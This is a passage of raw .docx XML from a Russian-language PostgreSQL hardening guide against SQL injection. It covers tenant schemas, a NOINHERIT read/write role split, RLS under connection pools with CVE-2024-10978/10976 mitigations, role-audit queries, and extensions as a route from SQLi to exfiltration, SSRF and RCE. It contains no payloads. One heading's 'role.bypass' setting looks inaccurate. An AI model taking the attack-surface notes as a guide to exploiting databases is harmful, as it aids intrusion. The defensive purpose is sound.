          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SCHEMA tenant_42 AUTHORIZATION tenant_42_role;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT USAGE ON SCHEMA app_shared TO tenant_42_role;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT ON ALL TABLES IN SCHEMA app_shared TO tenant_42_role;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В tenant_42 — tenant имеет CREATE; в shared — только SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Преимущество: даже если injection даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, она пишется только в tenant_42-схему. Сheck на ownership уже встроен в search_path semantics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disadvantage: scaling до 10k+ tenants на одной БД даёт большое число schemas → managed catalog growth. Альтернатива — RLS с tenant_id discriminator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sandboxing через `noinherit` и `set_config('role.bypass', off)`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для критичных операций — отдельный role без INHERIT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE app_role NOINHERIT LOGIN PASSWORD '...';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE app_writer;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT INSERT, UPDATE, DELETE ON ALL TABLES IN SCHEMA app TO app_writer;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT app_writer TO app_role;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 В коде: для write-операций — SET ROLE app_writer, для read — RESET ROLE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Read-only операции работают как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app_role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (только SELECT); write-операции требуют явного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Это структурно ограничивает blast radius injection в read-path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-tenant + RLS + connection pool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если использовать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per-request в connection pool, нужно учитывать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R8 / R9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2024-10978, CVE-2024-10976) — баг reset path до patches 14.11.2024. Mitigation:</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`SET LOCAL` вместо `SET`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — переменная действует только до конца текущей transaction; в pool возвращается чистый state.</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Уникальные сессии</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для критичных операций — без pool.</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Upgrade на patched minor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21) — закрывает R8/R9.</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`FORCE ROW LEVEL SECURITY`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — independent от SET ROLE bug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Подробно — в 4.7 (chain R8 + R9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit-команды</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Регулярный audit application-ролей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Все granted роли (включая predefined):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT r.rolname, m.rolname AS member_of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_roles r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_auth_members am ON am.member = r.oid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_roles m ON am.roleid = m.oid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE r.rolname = 'your_app_role';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Прямые table-permissions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT grantee, table_schema, table_name, privilege_type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM information_schema.role_table_grants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE grantee = 'your_app_role'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY table_schema, table_name;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BYPASSRLS / CREATEROLE / CREATEDB / SUPERUSER флаги:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolname, rolsuper, rolbypassrls, rolcreaterole, rolcreatedb, rolreplication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_roles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE rolname = 'your_app_role';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с другими разделами 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5.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Расширения — конкретные extension-USAGE-grants, которые не давать application.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5.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Конфиги — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_security = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">default_transaction_read_only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для read-only роли.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5.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Логирование — детекция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к привилегированным ролям от application connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с категориями 3.X.N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2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фундамент: какие роли есть в PostgreSQL и что они дают.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 / 3.7 / 3.13 / 3.17.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основные категории, которые блокируются отсутствием privilege.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 — не одноразовое действие</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: privilege creep — постоянная угроза; audit grants раз в квартал минимум.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Расширения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Расширения — основной источник серверных capabilities, которыми эксплуатация SQLi превращается в OOB-эксфильтрацию, SSRF, RCE и file r/w (категории 3.6 и 3.7). Каждое расширение добавляет конкретный attack surface. Принцип: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ставить только то, что реально нужно, и ограничивать USAGE</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Trusted vs untrusted (с PG 13)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 13 ввёл понятие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — расширения, которые non-superuser с CREATE на DB может установить себе (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без необходимости в superuser). Untrusted — только superuser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Список trusted в стандартной поставке (PG 13+, ~24 расширения):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
